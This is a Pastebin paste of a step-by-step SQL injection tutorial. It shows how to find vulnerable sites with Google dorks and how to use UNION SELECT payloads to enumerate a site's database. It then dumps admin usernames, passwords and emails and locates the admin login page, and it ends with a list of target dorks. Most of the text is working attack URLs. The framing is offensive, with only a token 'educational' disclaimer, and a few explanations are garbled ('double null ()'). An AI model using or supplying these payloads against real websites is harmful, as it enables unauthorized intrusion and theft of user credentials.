API tools faq
paste
Advertisement
seraphnb

SQL Tutorial

seraphnb
Apr 11th, 2013
10,743
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 13.63 KB | None | 0 0
raw download clone embed print report
  1. SQL Tutorial
  2. written by Neurological
  3.  
  4. Table of Contents
  5. =======
  6. Introduction
  7. Part One - Website Assessment
  8. Section One - Finding a vulnerable website
  9. Section Two - Determining the amount of columns
  10. Section Three - Finding which columns are vulnerable
  11. Part Two - Gathering Information
  12. Section One - Determining the SQL version
  13. Section Two - Finding the database
  14. Part Three - The Good Stuff
  15. Section One - Finding the table names
  16. Section Two - Finding the column names
  17. Section Three - Displaying the column contents
  18. Section Four - Finding the admin page
  19.  
  20. =======
  21. Introduction
  22.  
  23. Here you will find a very detailed, step by step tutorial originally written by Neurological on SQL injection. This is purely for educational purposes and is to be used at the discretion of the reader.
  24.  
  25. First we have to know what SQL injection is exactly. According to Wikipedia: "SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks."
  26.  
  27. Now, that's only the first paragraph. I would advise reading
  28. http://en.wikipedia.org/wiki/SQL_injection
  29. before going on. Once you have finished that and you understand, we can begin.
  30.  
  31. =======
  32. Part One - Website Assessment
  33.  
  34. In order for us to start exploiting a website, we must first know exactly what we are injecting into. This is what we will be covering in Part One, along with how to assess the information that we gather.
  35.  
  36. ==
  37. Section One - Finding a vulnerable website
  38.  
  39. Vulnerable websites can be found using dorks (Appendix I), either in Google or with an exploit scanner. For those of you that are unfamiliar with the term "dorks", I will try to explain.
  40.  
  41. Dorks are website URLs that are known to be vulnerable. In SQL injection these dorks look like inurl:buy.php?id= . This will be inputted into a search engine, and because of the inurl: part of the dork, the search engine will only return results with URLs that contain the same characters. Some of the sites that have this dork on their website may be vulnerable to SQL injection.
  42.  
  43. Now, let's say we've found the page
  44. http://www.site.com/buy.php?id=1
  45. In order to test this site, all we need to do is add an apostrophe, either in between the value (in this case, the "1") and the operator (the "=" sign) so it looks like
  46. http://www.site.com/buy.php?id='1
  47. or after the value ("1") so that it looks like
  48. http://www.site.com/buy.php?id=1'
  49.  
  50. After pressing enter, if this website returns an error along the lines of "Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home1/michafj0/public_html/gallery.php on line 7" it's vulnerable to injection.
  51.  
  52. In the case where you are to find a website such as
  53. http://www.site.com/buy.php?id=1&dog;catid=2
  54. you must use the first technique, where you add an apostrophe between the value (in this case the number) and the operator (the "=" sign) so that it looks like
  55. http://www.site.com/buy.php?id='1&dog;catid='2
  56.  
  57. There are programs that will do this for you, but, to start off, I would suggest simply to do things manually, using Google. After getting skilled enough at this, if you particularly wanted a program for this, I would recommend using the Exploit Scanner by Reiluke.
  58.  
  59. ==
  60. Section Two - Determining the amount of columns
  61.  
  62. In order for us to be able to use commands and get results, we must know how many columns there are on a website. To find the number of columns, we must use a very complex and advanced method that I like to call "trial and error" with the ORDER BY command Biggrin.
  63.  
  64. Note: SQL does not care whether or not your letters are capitalized or not. I am doing it for the clarity of this tutorial.
  65.  
  66. To find the number of columns, we write a query with incrementing values until we get an error. http://www.site.com/buy.php?id=1 ORDER BY 1 <-No error
  67. http://www.site.com/buy.php?id=1 ORDER BY 2 <-No error
  68. http://www.site.com/buy.php?id=1 ORDER BY 3 <-No error
  69. http://www.site.com/buy.php?id=1 ORDER BY 4 <-No error
  70. http://www.site.com/buy.php?id=1 ORDER BY 5 <-error!
  71. In this example, there are four columns.
  72.  
  73. Be sure not to forget a double null () after the query. It marks when the code ends.
  74.  
  75. ==
  76. Section Three - Finding which columns are vulnerable
  77.  
  78. Now that we know, in our example, that there are four columns, we have to find out which ones are vulnerable to injection. To do this we use the UNION and SELECT queries while keeping the double null () at the end of the string. There is also one other difference. It is small in size but not in importance. See if you can spot it.
  79.  
  80. http://www.site.com/buy.php?id=-1 UNION SELECT 1,2,3,4
  81.  
  82. If you couldn't spot the difference, it's the extra null in between the operator and the value.
  83.  
  84. buy.php?id=-1
  85.  
  86. Now, after entering that query, you should be able to see some numbers somewhere on the page that seem out of place. Those are the numbers of the columns that are vulnerable to injection. We can use those columns to pull information from the database, which we will see in Part Two.
  87.  
  88. =======
  89. Part Two - Gathering Information
  90.  
  91. In this part, we will discover how to find the name of the database and what version of SQL the website is using by using queries to exploit the site.
  92.  
  93. ==
  94. Section One - Determining the SQL version.
  95.  
  96. Finding the version of the SQL of the website is a very important step because the steps you take for version 4 are quite different from version 5 in order to get what you want. In this tutorial, I will not be covering version 4 because it really is a guessing game and for the kind of sites that are still using it, it's not worth your time.
  97.  
  98. If we look back to the end of Section Three in Part One we saw how to find the vulnerable columns. Using that information we can put together our next query (I will be using column 2). The command should look like
  99. http://www.site.com/buy.php?id=-1 UNION SELECT 1,@@version,3,4
  100.  
  101. Because 2 is the vulnerable column, this is where we will place "@@version". Another string that could replace "@@version" is "version()".
  102.  
  103. If the website still does not display the version try using unhex(hex()) which looks like http://www.site.com/buy.php?id=-1 UNION SELECT 1,unhex(hex(@@version)),3,4
  104.  
  105. Note: If this method is used here, it must be used for the rest of the injection as well.
  106.  
  107. Now what you want to see is something along the lines of "5.1.47-community-log", which is the version of the SQL for the website.
  108.  
  109. Note: If you see version 4 and you would like to have a go at it, there are other tutorials that explain how to inject into it.
  110.  
  111. ==
  112. Section Two - Finding the database
  113.  
  114. Finding the name of the database is not always a necessary step to take to gather the information that you want, but, in my experience, following these steps and finding the database may sometimes lead to a higher success rate.
  115.  
  116. To find the database we use a query like the
  117. http://www.site.com/buy.php?id=-1 UNION SELECT 1,group_concat(schema_name),3,4 from information_schema.schemata
  118. This could sometimes return more results than necessary, and so that is when we switch over to
  119. http://www.site.com/buy.php?id=-1 UNION SELECT 1,concat(database()),3,4
  120.  
  121. Congratulations! You now have the name of the database! Copy and paste the name somewhere safe; we'll need it for later.
  122.  
  123.  
  124. =======
  125. Part Three - The Good Stuff
  126.  
  127. This is the fun part where we will find the usernames, emails and passwords!
  128.  
  129. ==
  130. Section One - Finding the table names
  131.  
  132. To find the table names, we use a query that is similar to the one used for finding the database, but with a little bit extra added on.
  133.  
  134. http://www.site.com/buy.php?id=-1 UNION SELECT 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()
  135.  
  136. It may look long and confusing, but, once you understand it, it really isn't, so I'll try to explain. What this query does is it "groups" (group_concat) the "table names" (table_name) together and gathers that information "from" (FROM) information_schema.tables where the "table schema" (table_schema) can be found in the "database" (database()).
  137.  
  138. Note: While using group_concat you will only be able to see 1024 characters worth of tables so if you notice that a table is cut off on the end switch over to limit
  139. http://www.site.com/buy.php?id=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1
  140.  
  141. What this does is it shows the first and only the first table. So if we were to run out of characters on let's say the 31st table we could use the query
  142. http://www.site.com/buy.php?id=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema=database() LIMIT 30,1
  143.  
  144. Notice how my limit was 30,1 instead of 31,1? This is because when using limit is starts from 0,1 which means that the 30th is actually the 31st Tongue.
  145.  
  146. You now have all the table names!
  147.  
  148. ==
  149. Section Two - Finding the column names
  150.  
  151. Now that you have all of the table names try and pick out the one that you think would contain the juicy information. Usually they're tables like User(s), Admin(s), tblUser(s) and so on but it varies between sites.
  152.  
  153. After deciding which table you think contains the information, use the query
  154. http://www.site.com/buy.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name="Admin"
  155. In my example, I used the table name "Admin".
  156.  
  157. This will either give you a list of all the columns within the table or give you an error but don't panic if it is outcome #2! All this means is that Magic Quotes is turned on. This can be bypassed by using a hex or char converter (they both work) to convert the normal text into char or hex (a link to a website that does this will be included at the end of the tutorial).
  158.  
  159. UPDATE: If you get an error at this point all you must do is follow these steps:
  160.  
  161. 1. Copy the name of the table that you are trying to access.
  162. 2. Paste the name of the table into [url=http://www.swingnote.com/tools/texttohex.php]this website[/url] where it says "Say Hello To My Little Friend".
  163. 3. Click convert.
  164. 4. Copy the string of numbers/letters under Hex into your query so it looks like [quote]http://www.site.com/buy.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name=0x41646d696e[/quote]
  165.  
  166. Notice how before I pasted the hex I added a "0x", all this does is tells the server that the following characters are part of a hex string.
  167.  
  168. You should now see a list of all the columns within the table such as username, password, and email.
  169.  
  170. Note: Using the limit function does work with columns as well.
  171.  
  172. ==
  173. Section Three - Displaying the column contents
  174.  
  175. We're almost done! All we have left to do is to see what's inside those columns and use the information to login! To view the columns we need to decide which ones we want to see and then use this query (in this example I want to view the columns "username", "password", and "email", and my database name will be "db123"). This is where the database name comes in handy.
  176.  
  177. http://www.site.com/buy.php?id=-1 UNION SELECT 1,group_concat(username,0x3a,password,0x3a,email),3,4 FROM db123.Admin
  178.  
  179. In this query, 0x3a is the hex value of a colon which will group the username:password:email for the individual users just like that.
  180.  
  181. FINALLY! Now you have the login information for the users of the site, including the admin. All you have to do now is find the admin login page which brings us to Section Four.
  182.  
  183. ==
  184. Section Four - Finding the admin page
  185.  
  186. Usually the admin page will be directly off of the site's home page, here are some examples: http://www.site.com/admin
  187. http://www.site.com/adminlogin
  188. http://www.site.com/modlogin
  189. http://www.site.com/moderator
  190.  
  191. Once again, there are programs that will find the page for you, but first try some of the basic guesses. It might save you a couple of clicks. If you do use a program, Reiluke has coded one for that as well. Search for Admin Finder by Reiluke.
  192.  
  193. And that concludes the tutorial! I hope it was helpful to some of you. Remember to keep practicing and eventually you'll have all of the queries memorized in no time!
  194.  
  195. Appendix I: Common Dork List
  196. trainers.php?id=
  197. article.php?ID=
  198. play_old.php?id=
  199. declaration_more.php?decl_id=
  200. Pageid=
  201. games.php?id=
  202. newsDetail.php?id=
  203. staff_id=
  204. historialeer.php?num=
  205. product-item.php?id=
  206. news_view.php?id=
  207. humor.php?id=
  208. communique_detail.php?id=
  209. sem.php3?id=
  210. opinions.php?id=
  211. spr.php?id=
  212. pages.php?id=
  213. chappies.php?id=
  214. prod_detail.php?id=
  215. viewphoto.php?id=
  216. view.php?id=
  217. website.php?id=
  218. hosting_info.php?id=
  219. gery.php?id=
  220. detail.php?ID=
  221. publications.php?id=
  222. Productinfo.php?id=
  223. releases.php?id=
  224. ray.php?id=
  225. produit.php?id=
  226. pop.php?id=
  227. shopping.php?id=
  228. productdetail.php?id=
  229. post.php?id=
  230. section.php?id=
  231. theme.php?id=
  232. page.php?id=
  233. shredder-categories.php?id=
  234. product_ranges_view.php?ID=
  235. shop_category.php?id=
  236. channel_id=
  237. newsid=
  238. news_display.php?getid=
  239. ages.php?id=
  240. clanek.php4?id=
  241. review.php?id=
  242. iniziativa.php?in=
  243. curriculum.php?id=
  244. labels.php?id=
  245. look.php?ID=
  246. galeri_info.php?l=
  247. tekst.php?idt=
  248. newscat.php?id=
  249. newsticker_info.php?idn=
  250. rubrika.php?idr=
  251. offer.php?idf=
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!